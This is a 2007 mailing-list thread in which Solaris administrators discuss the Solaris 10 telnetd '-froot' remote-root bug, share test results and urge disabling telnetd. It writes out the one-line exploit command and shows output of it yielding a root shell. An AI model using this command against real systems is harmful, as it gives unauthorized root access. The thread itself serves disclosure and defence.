[geeks] Solaris 10 Remote-Root Exploit

Lionel Peterson lionel4287 at verizon.net
Mon Feb 12 10:32:54 CST 2007 

Wait a minute, I just tried this on my local box, and found the following results from my WinXP laptop:

The Command telnet -l"-froot" 192.168.1.249 alerts me to the fact that I am not on the system console and dumps the attempt.

The command telnet -l"-flionel" 192.168.1.249 prompts me with a login request "login:".

This system is Solaris 10 06/06 (Update 2) with most recent patches applied, and no significant effort to secure the box...

Using the telnet client on the Solaris 10 06/06 machine to access itself also fails, because I am not on the system console - i get "not on system console" and the connection is terminated.

My thought is that this *exploit* requires that you have either disabled the system console check on telnet *or* you are sitting on the console when you do this. It's a problem, but I think the original poster (pointed to by slashdot) disabled the telnet check for root on system console.

Lionel


>From: "Jonathan C. Patschke" <jp at celestrion.net>
>Date: 2007/02/12 Mon AM 07:45:40 CST
>To: Sun-Rescue Mailing List <rescue at sunhelp.org>, Geeks <geeks at sunhelp.org>
>Subject: [geeks] Solaris 10 Remote-Root Exploit

>Just saw this on Slashdot:
>
>   http://riosec.com/solaris-telnet-0-day
>
>And verified that it works:
>
>   [jp at cobra:~]$ telnet -l"-froot" lic4
>   Trying 10.10.100.120...
>   Connected to lic4.centtech.com.
>   Escape character is '^]'.
>   Last login: Wed Jan 17 16:53:28 from hal10.centtech.
>   Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
>   You have mail.
>   # Connection closed by foreign host.
>   [jp at cobra:~]$ exit
>   Connection to cobra.centtech.com closed.
>
>If you have any public-facing systems running Solaris's telnetd, you
>should disable it now.  Even turning off remote root logins is
>insufficient, since this seems to bypass PAM.
>
>-- 
>Jonathan Patschke ) "I would buy a Mac today if I was not working at
>Elgin, TX        (   Microsoft."      --Jim Allchin, VP of Platforms
>_______________________________________________
>GEEKS:  http://www.sunhelp.org/mailman/listinfo/geeks

More information about the geeks mailing list